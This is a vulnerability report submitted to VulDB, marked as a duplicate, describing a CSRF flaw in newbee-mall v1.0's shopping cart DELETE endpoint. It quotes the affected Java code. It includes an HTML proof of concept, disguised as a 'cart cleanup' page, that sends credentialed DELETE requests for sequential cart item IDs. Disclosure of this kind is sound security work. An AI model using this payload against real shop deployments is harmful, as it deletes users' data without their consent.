Submit #752803: newbee-ltd newbee-mall v1.0 CSRFinfo

Titlenewbee-ltd newbee-mall v1.0 CSRF
Description# CSRF Vulnerability in Shopping Cart Item Deletion ## Summary A **CSRF vulnerability** exists in the shopping cart deletion endpoint `/shop-cart/{cartItemId}` (DELETE). Attackers can empty users' shopping carts, causing inconvenience and potential loss of carefully curated selections. ## Vulnerability Details ### Configuration-Level Issue **File**: `src/main/java/ltd/newbee/mall/config/NeeBeeMallWebMvcConfigurer.java` ```java @Configuration public class NeeBeeMallWebMvcConfigurer implements WebMvcConfigurer { public void addInterceptors(InterceptorRegistry registry) { registry.addInterceptor(newBeeMallLoginInterceptor) .addPathPatterns("/shop-cart/**"); // ❌ No CSRF token validation } } ``` ### Endpoint-Level Code Analysis **File**: `src/main/java/ltd/newbee/mall/controller/mall/ShoppingCartController.java` (Lines 93-105) ```java @DeleteMapping("/shop-cart/{newBeeMallShoppingCartItemId}") @ResponseBody public Result updateNewBeeMallShoppingCartItem(@PathVariable("newBeeMallShoppingCartItemId") Long newBeeMallShoppingCartItemId, HttpSession httpSession) { NewBeeMallUserVO user = (NewBeeMallUserVO) httpSession.getAttribute(Constants.MALL_USER_SESSION_KEY); // ❌ No CSRF token validation // ⚠️ Cart item IDs are sequential and predictable Boolean deleteResult = newBeeMallShoppingCartService.deleteById(newBeeMallShoppingCartItemId, user.getUserId()); if (deleteResult) { return ResultGenerator.genSuccessResult(); } return ResultGenerator.genFailResult(ServiceResultEnum.OPERATE_ERROR.getResult()); } ``` **Security Issues**: 1. ❌ No CSRF token validation 2. ⚠️ Cart item IDs are predictable (sequential integers) 3. ⚠️ Can delete multiple items in batch ## Proof of Concept (PoC) ```html <!DOCTYPE html> <html> <head> <title>Cart Cleanup Service</title> </head> <body> <h2>???? Cleaning expired items from cart...</h2> <div id="progress">Processing...</div> <script> // Delete cart items by guessing sequential IDs var deletedCount = 0; for (var i = 1; i <= 100; i++) { fetch('http://localhost:28089/shop-cart/' + i, { method: 'DELETE', credentials: 'include' }) .then(response => response.json()) .then(data => { if (data.resultCode == 200) { deletedCount++; document.getElementById('progress').innerHTML = 'Removed ' + deletedCount + ' expired items'; } }); } setTimeout(function() { document.getElementById('progress').innerHTML = '✅ Cart cleanup complete!'; }, 3000); </script> </body> </html> ``` ## Impact **Shopping cart emptying causing user inconvenience** - Users lose their saved shopping selections and must recreate their carts, leading to frustration and potential business loss. --- **CVSS Score**: 5.3 (Medium)
Source⚠️ https://github.com/newbee-ltd/newbee-mall/issues/112
User
 flashzyc (UID 92850)
Submission02/05/2026 11:57 (4 months ago)
Moderation02/18/2026 07:56 (13 days later)
StatusDuplicate
VulDB entry346456 [newbee-ltd newbee-mall up to a069069b07027613bf0e7f571736be86f431faee Multiple Endpoints cross-site request forgery]
Points0

PreviousOverviewNext

Do you want to use VulDB in your project?

Use the official API to access entries easily!